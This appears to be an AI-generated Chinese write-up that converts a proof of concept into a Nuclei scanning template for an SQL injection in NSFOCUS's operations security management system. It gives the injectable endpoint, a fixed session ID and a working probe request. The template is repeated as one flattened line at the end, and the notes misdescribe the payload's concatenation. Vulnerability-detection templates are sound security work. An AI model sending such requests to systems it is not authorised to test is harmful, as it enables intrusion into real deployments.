### 解析要点
-
**漏洞名称**:绿盟运维安全管理系统SQL注入漏洞
-
**端点与方法**:GET /webconf/log/getDBType
-
**注入点**:`sql` 参数
-
**PoC关键参数**:`cat=espc`、`sid=7473a85e535405e7bd991cb82b2f134c`(假设为测试用固定值)
-
**响应证据**:执行注入后返回 `qppq`(由 `CHR(113)+CHR(112)+CHR(112)+CHR(113)` 生成)
-
**严重级别**:High(SQL注入无权限限制时默认High)
-
**参考链接**:用户提供的微信文章链接
### 最终YAML模板
```yaml
id: nsfocus-ops-security-sqli-202512290956
info:
name: 绿盟运维安全管理系统SQL注入漏洞
author: auto-generator
severity: High
description: 绿盟运维安全管理系统存在SQL注入漏洞,攻击者可通过构造恶意GET请求注入SQL语句,获取敏感信息或执行任意操作。
tags: [web, sqli, nsfocus, vulnerability]
reference:
- https://mp.weixin.qq.com/s/f_odVBl_8N7NCxXPQEIV-Q
classification:
cwe-id: CWE-89
cve-id: ""
cvss-metrics: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
stop-at-first-match: true
http:
- raw:
- |
GET /webconf/log/getDBType?cat=espc&sid=7473a85e535405e7bd991cb82b2f134c&sql=(SELECT+CHR(113)%257C%257CCHR(112)%257C%257CCHR(112)%257C%257CCHR(113)) HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: */*
Connection: close
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "qppq"
case-insensitive: false
```
**说明**:
-
模板采用PoC原始请求复刻,保留关键参数 `sid` 和 `cat`;
-
注入payload生成 `qppq` 字符串作为响应证据;
-
若 `sid` 为临时值,需替换为实际有效sid或通过前置请求获取;
-
严重级别按无权限限制SQL注入默认设为High,可根据实际CVSS调整。
-
符合Nuclei 3.x规范,包含必要的matchers和stop机制。
-
严格遵循用户需求,仅输出最终YAML模板,无多余内容。
yamlid: nsfocus-ops-security-sqli-202512290956 info: name: 绿盟运维安全管理系统SQL注入漏洞 author: auto-generator severity: High description: 绿盟运维安全管理系统存在SQL注入漏洞,攻击者可通过构造恶意GET请求注入SQL语句,获取敏感信息或执行任意操作。 tags: [web, sqli, nsfocus, vulnerability] reference: - https://mp.weixin.qq.com/s/f_odVBl_8N7NCxXPQEIV-Q classification: cwe-id: CWE-89 cve-id: "" cvss-metrics: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" stop-at-first-match: true http: - raw: - | GET /webconf/log/getDBType?cat=espc&sid=7473a85e535405e7bd991cb82b2f134c&sql=(SELECT+CHR(113)%257C%257CCHR(112)%257C%257CCHR(112)%257C%257CCHR(113)) HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept: */* Connection: close matchers-condition: and matchers: - type: status status: - 200 - type: word part: body words: - "qppq" case-insensitive: false